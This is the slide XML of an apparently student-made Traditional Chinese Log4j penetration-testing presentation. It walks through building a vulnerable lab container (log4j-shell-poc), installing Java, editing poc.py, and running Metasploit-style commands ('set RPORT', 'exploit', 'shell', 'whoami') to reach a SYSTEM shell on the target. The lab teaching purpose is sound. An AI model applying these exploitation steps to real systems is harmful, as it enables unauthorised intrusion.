      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="802178" y="1047907"/>
            <a:ext cx="7772400" cy="3490598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21426555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修正錯誤的設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>set RPORT 8282</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288582" y="3241964"/>
            <a:ext cx="6159016" cy="1303164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217055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B84B5DE1-3619-4A3C-8E26-FA0BB907D87D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="1122426"/>
            <a:ext cx="7772400" cy="2880274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E076A79-80BD-465E-8F42-49C2CB4A8CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="452736"/>
            <a:ext cx="5870646" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>確認設定無誤後，便執行攻擊指令 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495299" y="4333786"/>
            <a:ext cx="5553075" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>進入靶機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 顯示目前使用者的身分 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(authority/system : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>最高權限，相當於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>root)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1092190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失敗</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509712" y="3694112"/>
            <a:ext cx="6124575" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13796850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a:t>滲透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>測試專</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
              <a:t>題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969393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484632"/>
            <a:ext cx="7772400" cy="1372743"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A Detailed Guide on Log4J Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204442" y="2317510"/>
            <a:ext cx="6735115" cy="3429479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3457433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732491" y="854074"/>
            <a:ext cx="5687483" cy="5349309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="900250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2878" y="257061"/>
            <a:ext cx="8086940" cy="898410"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資訊收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Information Gathering)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="781998" y="1590063"/>
            <a:ext cx="5851558" cy="4440027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="714893" y="1155471"/>
            <a:ext cx="6889173" cy="5486398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31870292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建置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>漏洞系統</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="376765" y="2726574"/>
            <a:ext cx="8081435" cy="1764911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15393318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cd log4j-shell-poc</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621631" y="3276005"/>
            <a:ext cx="5900738" cy="1164431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34340786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85775" y="-305943"/>
            <a:ext cx="7772400" cy="1609344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>建置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞系統</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 6"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197033" y="977373"/>
            <a:ext cx="5952647" cy="5589681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11090471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建置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>漏洞系統</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347597" y="1640876"/>
            <a:ext cx="8448806" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>run --network host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>log4j-shell-poc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="內容版面配置區 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252329" y="2120900"/>
            <a:ext cx="6639341" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31441465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723672" y="2120900"/>
            <a:ext cx="5696655" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1252604"/>
            <a:ext cx="8452138" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://mirrors.huaweicloud.com/java/jdk/8u202-b08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="501134"/>
            <a:ext cx="1074268" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>安裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>java</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="圓角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1723672" y="4667250"/>
            <a:ext cx="1543403" cy="1524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7517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3547" y="351420"/>
            <a:ext cx="4572000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> jdk-8u202-linux-x64.tar.gz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>mv jdk1.8.0_202 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750136" y="2877171"/>
            <a:ext cx="7000875" cy="1466850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750136" y="3610596"/>
            <a:ext cx="4804756" cy="31588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961116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313986" y="1223124"/>
            <a:ext cx="6782225" cy="4396279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37966160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1604" y="368254"/>
            <a:ext cx="7772400" cy="778903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>改攻擊程式碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>poc.py</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61604" y="1365855"/>
            <a:ext cx="8424243" cy="3206145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圓角矩形 4"/>
